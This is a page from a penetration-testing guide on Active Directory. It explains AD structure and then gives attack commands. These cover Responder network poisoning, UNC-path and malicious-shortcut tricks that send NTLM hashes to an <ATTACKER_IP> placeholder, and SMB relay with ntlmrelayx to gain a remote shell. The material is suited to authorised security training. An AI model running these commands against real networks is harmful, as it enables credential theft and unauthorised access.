The Pentesting Guide
TwitterBlog
  • The Pentesting Guide
  • ℹ️0 - Pre-Engagement
  • 🔍1 - Information Gathering
  • Passive (OSINT)
  • Active
    • 🕵️HUMINT
    • WIFI
    • IP & Port Scanning
    • Services
      • 21 - FTP
      • 22 - SSH
      • 25 - SMTP
      • 53 - DNS
      • 80,443 - WEB
      • 88 - Kerberos
      • 110 - POP3
      • 111 - rpcbind
      • 161 - SNMP
      • 389 - LDAP
      • 139,445 - SMB
      • Active Directory
  • 💣2 - Exploitation
  • Brute Forcing
  • WEB
    • Apache Tomcat
    • Authentication
    • Broken Access Control
    • Cache poisoning
    • Clickjacking
    • CORS
    • CSRF
    • File Inclusion
    • Host Header Injection
    • HTTP Request Smuggling
    • Information disclosure
    • JWT
    • OS command injection
    • PHP deserialisation
    • SQLi
    • SSRF
    • SSTI
    • Shellshock
    • Unrestricted File Upload
    • XSS
    • XXE
  • Web (OWASP Test cases)
    • 4.1 Information Gathering
    • 4.2 Configuration and Deployment Management Testing
    • 4.3 Identity Management Testing
    • 4.4 Authentication Testing
    • 4.5 Authorization Testing
    • 4.6 Session Management Testing
    • 4.7 Input Validation Testing
    • 4.8 Testing for Error Handling
    • 4.9 Testing for Weak Cryptography
    • 4.10 Business Logic Testing
    • 4.11 Client-side Testing
    • 4.12 API Testing
  • WIFI
  • HUMINT
    • 🎣Gophish (Phishing)
    • Malicious Phishing Files
    • Phishing Evaluation
  • BoF - Windows(x86)
  • Active Directory
    • Kerberos
    • GPOs
    • Certificates
    • LAPS
    • Domain Trusts
  • 👿3 - Post Exploitation
  • File transfer
  • Shells
  • Situational Awareness
    • Containers and VMs
    • Linux
    • Windows
      • Dumping Credentials
      • Countermeasure Evasion
    • Active Directory
      • BloodHound & SharpHound
  • General
    • Linux
    • Windows
  • Local Privilege Escalation
    • Linux
    • Windows
  • Persistance
    • Windows
  • Cracking
  • Pivoting
    • Tunnelling & Port Forwarding
  • Lateral Movement
  • WIFI
  • 📓4 - Report
  • 🧹5 - House cleaning
Powered by GitBook
On this page
  • Introduction
  • Enumeration
  • Poison the network
  • Triggering responder
  • SMB Relay Attack
  • References
  1. Active
  2. Services

Active Directory

Last updated 1 year ago

Introduction

Active Directory (AD) allows network administrators to control computers and services and the interaction between them and the user within the domain.

The data is stored in a hierarchical structure consisting of five main components: Objects, Organizational Units, domains, trees, and forests.

  • Object: An object is an essential element in AD that represents a user, a group, a computer, an application, a printer, or a shared folder.

  • Organizational Unit (OU): An Organizational Unit is an object that acts as a "directory" of objects. It can also contain other organizational units.

  • Domain: A domain represents a group of objects which share the same AD database (AD DB).

  • Tree: A tree is a collection of one or more domains in a contiguous namespace. For instance, "uk.example.com" and "es.example.com" are considered in the same tree.

  • Forest: A forest is a collection of trees where the trees can trust each other and share directory schemes, application information and domain configuration.

Finally, Active Directory is a combination of services:

  • Domain Services: The primary function is to store data and manage communications between users and the DC.

  • Certificate Services: Creates, manages and shares encryption certificates for exchanging information securely over the internet.

  • Lightweight Directory Services: Supports LDAP for cross-platform domain services.

  • Active Directory Federation Services: Provides users with Single Sign-On (SSO) authentication to access multiple applications in the same session, so users do not have to provide the same credentials.

  • Rights Management: Controls information rights and data access policies. It also encrypts the content, such as documents or emails.

Enumeration

Nonetheless, a good starting point would be to gather information about the DNS, SMB, LDAP and Kerberos services.

Poison the network

With the use of the tool responder, an attacker can poison the network (LLMNR, NBT-NS, MDNS protocols) so that the victims will communicate with their machine. If the host belongs to a resource that requires identification, the user and their NTLMv2 hash will be sent to the attacker. After that, they can be cracked offline and then used to access the poisoned victims' machines.

sudo responder -I <NETWORK_INTERFACE> -Prdwv 

Triggering responder

If an attacker got RCE on a service that has an associated AD account or wants to perform social engineering, here there are some tips to obtain NTLM hashes with responder.

Redis

redis-cli -h <IP> -p <PORT> eval "dofile('//<ATTACKER_IP>//share')" 0

CMD

Through the CLI you can access the responder server in order to obtain the user's NTLM hash.

C:\Users\victim> \\<ATTACKER_IP>\

Windows shortcut

./mslink_v1.3.sh -l name -n shortcut -i \\\\<ATTACKER_IP>\\a -o out.lnk

SMB Relay Attack

An SMB Relay attack consists when an attacker captures a user's NTLM hash and relays it into another machine on the network to gain a remote shell or file access.

This attack only works if SMB Signing is disabled on the target, you can check it by executing the following command against the victim machine.

nmap --script=smb2-security-mode.nse -p445 -Pn <VICTIMS_IP>

If "Message signing enabled but not required" appears in the result, the machine is vulnerable.

Turn off SMB in the Responder configuration as NTLMRelayX will be handling SMB.

sudo sed -i 's/SMB = On/SMB = Off/' /etc/responder/Responder.conf
responder.py -I eth0 -wdr -v

Then, you need to execute the impacket module ntlmrelayx to obtain an interactive shell, waiting for the responder to obtain an NTLM response.

ntlmrelayx -tf <TARGET> -smb2support -i

References

Since Active Directory is a set of services, a domain can contain services like SMTP, Web, and SMB that the attacker will have to exploit them to obtain some credentials or access the system. There are and that the attacker can follow to gather information.

You can create windows shortcuts with to retrieve the NTLM hash once the victim clicks on it.

cheatsheets
mindmaps
mslink.sh
Windows/AD cheatsheet environments cheatsheet
Pentesting AD MindMap
Active Directory Methodology
Pentesting Active Directory
Active Directory Exploitation Cheat Sheet
SMB Relay Attack
What is Active Directory and how does it work?
Active Directory Domain Services
Gaining Credentials Easily with Responder Tool
AD Object structure